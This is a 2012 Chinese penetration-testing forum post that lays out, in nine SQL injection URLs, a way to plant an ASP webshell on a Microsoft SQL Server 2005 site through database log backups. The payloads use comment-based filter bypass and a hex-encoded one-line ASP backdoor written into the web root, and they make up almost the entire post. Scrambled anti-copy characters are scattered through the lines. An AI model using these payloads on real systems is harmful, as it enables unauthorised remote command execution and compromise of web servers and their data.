中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

---

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
( F( x: g: R9 t9 b1 hhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--

第二步：
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第三步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
" J; G* t. K  _9 E) Y0 ?& ^# {5 P
6 q7 }7 \/ k7 Z  Z, u/ p第四步
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
" T3 o0 w9 m6 A' s/ U
5 ]! L! i& p/ Y) x6 t8 A第五步
! T# l9 d& Q' v% r/ W4 e! u- Fhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第六步
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
* [$ F! J7 @8 v
- r/ B; G3 j- n9 b6 [第七步
1 e) X7 ?. p/ y6 o  L, d: N' Yhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第八步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--

第九步
2 E/ x' {2 X& R  [http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
- e, O) A. S0 A0 `) j2 l" m

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2